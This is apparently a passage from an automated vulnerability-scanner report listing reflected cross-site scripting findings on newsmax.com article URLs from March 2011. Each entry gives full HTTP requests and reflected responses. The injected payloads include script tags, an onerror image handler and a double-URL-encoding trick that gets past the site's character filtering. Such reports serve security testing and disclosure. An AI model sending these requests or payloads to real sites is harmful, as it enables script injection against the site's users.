GET /FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922d05f4%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ee0d02c828fc HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 42273 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... <a href="javascript:printPage(389922d05f4"><img src=a onerror=alert(1)>e0d02c828fc);" class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fe4e8'%20a%3db%20aa0ecbba7b5 was submitted in the REST URL parameter 7. This input was echoed as fe4e8' a=b aa0ecbba7b5 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922fe4e8'%20a%3db%20aa0ecbba7b5 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 41829 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... tp://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922fe4e8' a=b aa0ecbba7b5' class="article_tools_link"> ...[SNIP]...
1.47. http://www.newsmax.com/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 675bc"><script>alert(1)</script>d246e4dc073 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922?675bc"><script>alert(1)</script>d246e4dc073=1 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46429 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:12:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Atten ...[SNIP]... tp://www.newsmax.com/ForwardToFriend?articleurl=/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922?675bc"><script>alert(1)</script>d246e4dc073=1')" class="article_tools_link"> ...[SNIP]...
1.48. http://www.newsmax.com/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 141e1'><script>alert(1)</script>499418e84e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922?141e1'><script>alert(1)</script>499418e84e5=1 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46424 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:12:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Atten ...[SNIP]... p://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922?141e1'><script>alert(1)</script>499418e84e5=1' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fb520'%20a%3db%209c85a64cb9 was submitted in the REST URL parameter 2. This input was echoed as fb520' a=b 9c85a64cb9 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/diet-tips-for-athletesfb520'%20a%3db%209c85a64cb9/2011/03/17/id/371695 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46141 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 10 Be ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/diet-tips-for-athletesfb520' a=b 9c85a64cb9/2011/03/17/id/371695' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c4221'%20a%3db%206a671921781 was submitted in the REST URL parameter 3. This input was echoed as c4221' a=b 6a671921781 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/diet-tips-for-athletes/2011c4221'%20a%3db%206a671921781/03/17/id/371695 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46150 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 10 Be ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/diet-tips-for-athletes/2011c4221' a=b 6a671921781/03/17/id/371695' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 67a3c'%20a%3db%203e2e536c989 was submitted in the REST URL parameter 4. This input was echoed as 67a3c' a=b 3e2e536c989 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/diet-tips-for-athletes/2011/0367a3c'%20a%3db%203e2e536c989/17/id/371695 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46150 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 10 Be ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/diet-tips-for-athletes/2011/0367a3c' a=b 3e2e536c989/17/id/371695' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cd299'%20a%3db%20b0170ee1c24 was submitted in the REST URL parameter 5. This input was echoed as cd299' a=b b0170ee1c24 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/diet-tips-for-athletes/2011/03/17cd299'%20a%3db%20b0170ee1c24/id/371695 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46150 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 10 Be ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/diet-tips-for-athletes/2011/03/17cd299' a=b b0170ee1c24/id/371695' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5912%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e26bbc82e1fc was submitted in the REST URL parameter 7. This input was echoed as b5912"><img src=a onerror=alert(1)>26bbc82e1fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695b5912%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e26bbc82e1fc HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 41414 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:15:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... <a href="javascript:printPage(371695b5912"><img src=a onerror=alert(1)>26bbc82e1fc);" class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c062f'%20a%3db%20d7e89e2c5c9 was submitted in the REST URL parameter 7. This input was echoed as c062f' a=b d7e89e2c5c9 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695c062f'%20a%3db%20d7e89e2c5c9 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 40970 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:15:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695c062f' a=b d7e89e2c5c9' class="article_tools_link"> ...[SNIP]...
1.55. http://www.newsmax.com/FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82e4b"><script>alert(1)</script>284a7cdfb01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695?82e4b"><script>alert(1)</script>284a7cdfb01=1 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46377 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 10 Be ...[SNIP]... <a href="javascript:fwdpopup('http://www.newsmax.com/ForwardToFriend?articleurl=/FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695?82e4b"><script>alert(1)</script>284a7cdfb01=1')" class="article_tools_link"> ...[SNIP]...
1.56. http://www.newsmax.com/FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b3b62'><script>alert(1)</script>c7eed70c3cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695?b3b62'><script>alert(1)</script>c7eed70c3cb=1 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46372 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 10 Be ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695?b3b62'><script>alert(1)</script>c7eed70c3cb=1' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fe5d1'%20a%3db%20781c4f4a53e was submitted in the REST URL parameter 2. This input was echoed as fe5d1' a=b 781c4f4a53e in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5fe5d1'%20a%3db%20781c4f4a53e/2011/03/17/id/389851 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45883 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Top 5 ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5fe5d1' a=b 781c4f4a53e/2011/03/17/id/389851' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 476bb'%20a%3db%209d3ff8534c5 was submitted in the REST URL parameter 3. This input was echoed as 476bb' a=b 9d3ff8534c5 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011476bb'%20a%3db%209d3ff8534c5/03/17/id/389851 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45883 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Top 5 ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011476bb' a=b 9d3ff8534c5/03/17/id/389851' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 162c9'%20a%3db%200e66b1b4ab0 was submitted in the REST URL parameter 4. This input was echoed as 162c9' a=b 0e66b1b4ab0 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03162c9'%20a%3db%200e66b1b4ab0/17/id/389851 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45883 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Top 5 ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03162c9' a=b 0e66b1b4ab0/17/id/389851' class="article_tools_link"> ...[SNIP]...
